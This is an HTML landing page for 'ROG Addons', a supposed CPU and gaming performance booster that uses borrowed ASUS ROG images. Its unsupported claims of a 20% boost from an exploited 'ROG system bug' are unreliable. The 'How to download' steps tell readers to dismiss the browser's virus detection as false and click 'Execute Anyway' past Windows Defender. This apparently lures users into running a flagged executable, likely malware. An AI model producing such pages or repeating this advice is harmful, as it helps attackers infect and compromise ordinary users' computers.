<!DOCTYPE html>
<html lang="en">
<head>
<title>ROG Addons - Performance Improvement</title>
<link rel="shortcut icon" type="image/png" href="image.png"/>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
* {
  box-sizing: border-box;
}

<nav class="navbar navbar-default">
</nav>
	

body {
  font-family: Arial, Helvetica, sans-serif;
}

	
header3 {
  background-color: #000000;
  color: white;
}


	

/* Style the list inside the menu */
nav ul {
  list-style-type: none;
  padding: 0;
}

article {
  float: left;
  padding: 20px;
  width: 100%;
  background-color: #000000;
  /* height: 900px;  only for demonstration, should be removed */
}

/* Clear floats after the columns */
section::after {
  content: "";
  display: table;
  clear: both;
}

/* Style the footer */
footer {
  background-color: #000000;
  padding: 10px;
  text-align: center;
  color: white;
}

/* Responsive layout - makes the two columns/boxes stack on top of each other instead of next to each other, on small screens */
@media (max-width: 600px) {
  nav, article {
    width: 100%;
    height: auto;
  }
}
</style>
</head>
<body>


	<nav class="navbar navbar-expand-lg navbar-dark bg-dark static-top">
  <div class="container">
    <a class="navbar-brand" href="index.html">
      <img src="image.png" class="rounded" height="80">
    </a>
    <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <span class="navbar-toggler-icon"></span>
    </button>
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ms-auto">
        <li class="nav-item">
          <a class="nav-link" href="download.html">Download</a>
        </li>
      </ul>
    </div>
  </div>
</nav>

<!-- Page Content -->

<section class="rounded">
	<article>
    <h1 style="color:white;">ROG Addons</h1>
	<p style="color:white;">ROG Addons is a performance booster made to upgrade performance by 20% while playing video games on a computer. This addon is very noticeable while playing games that are very intense to your CPU and RAM. This Addon's boost is approximatively 1.8 times better than the ROG Boost.</p>
	<a class="btn btn-primary" href="download.html" role="Download ROG Addons">Download Now</a>
<p>&nbsp;</p>
<p>&nbsp;</p>

<p style="color:white;">The 20% boost is very worth it compared to other performance boosters' capabilities.</p>
<p><img src="https://dlcdnrog.asus.com/rog/media/1635287514651.jpg" alt="ASUS Computer" width="506" height="293" /></p>

<p>&nbsp;</p>
<p>&nbsp;</p>

<p style="color:white;">You may be wondering how this boost was found.</p>
<p style="color:white;">This boost is a bug in the ROG system providing users the ability to overclock their CPU more than what is normally allowed.</p>

<p><img src="https://rog.asus.com/websites/global/products/mutJZMS4AmtmyQbV/img/kv/kv.jpg" alt="computers" width="549" height="317" /></p>

<p>&nbsp;</p>

<p style="color:white;">This addon is very worth it compared to other performance boosters, providing the user with control over their performance in a click.</p>

<p>&nbsp;</p>
<p>&nbsp;</p>

<h1 style="color:white;">How to download:</h1>
<p style="color:white;">Scroll up to the navigation bar on top of the screen.</p>
<p style="color:white;">Click "Download".</p>
<p style="color:white;">Click "Download Executable".</p>
<p style="color:white;">If Chrome (or any other browser) detects it as a virus, that result is false, click the arrow and conserve the file.</p>
<p><img src="https://user-images.githubusercontent.com/314120/29831906-72bb11be-8c9b-11e7-833d-90b9483eaa4a.png" alt="Chrome error" width="564" height="231" /></p>
<p style="color:white;">Once the executable is downloaded, tell windows defender the file is safe by clicking "Execute Anyway".</p>
<p><img src="https://news-cdn.softpedia.com/images/news2/how-to-unblock-a-file-blocked-by-windows-defender-smartscreen-in-windows-10-525717-3.jpg" alt="Click Execute Anyway" width="624" height="312" /></p>
<p style="color:white;">Execute the file once. If a window pops up saying it was downloaded, then you've completed the installation of the program.</p>
<p><img src="saved.png" alt="Saved" width="624" height="312" /></p>
<p style="color:white;">Enjoy!</p>
<p>&nbsp;</p>
<p>&nbsp;</p>

  </article>
  
</section>

<footer>
  <p>© ROG Addons, 2021 - All rights reserved</p>
</footer>

</body>
</html>